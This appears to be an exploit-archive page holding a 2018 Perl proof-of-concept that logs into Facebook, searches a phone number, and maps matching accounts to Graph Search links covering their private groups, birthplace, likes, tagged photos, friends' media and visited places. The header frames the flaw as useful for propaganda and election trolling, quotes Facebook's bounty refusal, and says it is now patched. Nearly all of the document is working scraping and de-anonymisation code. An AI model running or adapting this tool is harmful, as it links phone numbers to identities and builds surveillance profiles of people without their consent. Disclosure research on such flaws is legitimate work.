Facebook Graph Phone Number Metadata Crosswalk Mapping Proof Of Concept



EKU-ID: 7531 CVE: OSVDB-ID:
Author: Todor Donev Published: 2018-04-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl
#
#  Facebook 'Graph' Phone Number metadata crosswalk mapping (PoC)
#
#  2018 Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#  Description:
#  Criminal hacker (CRACKER) can take advantage of 
#  this weakness by creating a specialized database 
#  to manipulate facebook users with fake news, 
#  propaganda or to influence elections with
#  distributed trolling. 
#
#  See Also: 
#  https://en.wikipedia.org/wiki/Schema_crosswalk
# 
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#
#  Use them at your own risk!
#
#
#  Requirements:
#  cpan install  HTTP::Cookies
#  cpan install  WWW::Mechanize
#  cpan install  List::MoreUtils
#  cpan install  Number::Phone
#
#  I know that is buggy but is only conceptual tool 
#  which demonstrate exploitation of this weakness.
#
#
#  Facebook answer:
#  Hi Todor,
#
#  Thank you for contacting us. Unfortunately what 
#  you have described is not currently covered by 
#  this program. Please see 
#  https://www.facebook.com/data-abuse/terms/ for 
#  more information about what is currently in scope 
#  of this program. We will follow up with you 
#  regarding any questions we may have. For any other 
#  questions or concerns, please visit our Help Center:
#  https://www.facebook.com/help.
#
#  Thanks,
# 
#  Amber Serrano
#  Developer Operations
#
#  Data Abuse Bounty is useless when this door is widely 
#  opened for criminal abusing.
#
#  No bounty for me.. :((
#
#  Now this weakness is patched!
#
use strict;
use warnings;
use WWW::Mechanize;
use HTTP::Cookies;
use List::MoreUtils qw(uniq);
use Number::Phone;
use open ':std', ':encoding(UTF-8)';
 
my $un   = '';          # facebook login
my $pw   = '';          # facebook password
print "[ Facebook \'Graph\' Phone Number Crosswalk Metadata Mapping (PoC)\n";
print "[ Website: https://ethical-hacker.org\n";
print "[ Author: Todor Donev <todor.donev at gmail.com>\n";
print "[ International Cybersecurity Association\n[\n";
die "[ Usage: perl $0 <Phone Number>\n" unless (scalar @ARGV)==1;
my $phnum = $ARGV[0];
my $pn = Number::Phone->new($phnum);
die "[ Error: This phone number is not valid\n" if(! eval { $pn->is_valid()});
my $useragent = "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0";
my $mech = WWW::Mechanize->new(agent => $useragent);$mech->cookie_jar(HTTP::Cookies->new());
$mech->get("http://m.facebook.com/login.php");
$mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw});
die "Error: $! \n" if !$mech->content() =~ /post_form_id\"\svalue=\"(\w+)\"/;
$mech->get("https://m.facebook.com/search/str/$phnum/keywords_search");
die   "[ Sorry, no results found\n[\n[ ==========================\n" if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.}));
if (my @userid = uniq($mech->content() =~ m/unit_id_result_id%22%3A(.*?)%2C%22/g)){
while (@userid) {
my $pid    = shift @userid;
printf "\x1b\x5b0;32m[\x1b\x5b0m User ID: \x1b\x5b0;35m https://www.facebook.com/$pid \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which private facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups-privacy \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Where the person is bornd:\x1b\x5b0;33m https://www.facebook.com/search/$pid/users-birth-place \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person commented on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which posts is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-in \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which photos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which photos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos maded by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-in \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which videos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m All visited places:\x1b\x5b0;33m https://www.facebook.com/search/$pid/places-visited \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which people are following:\x1b\x5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m \n";
}
}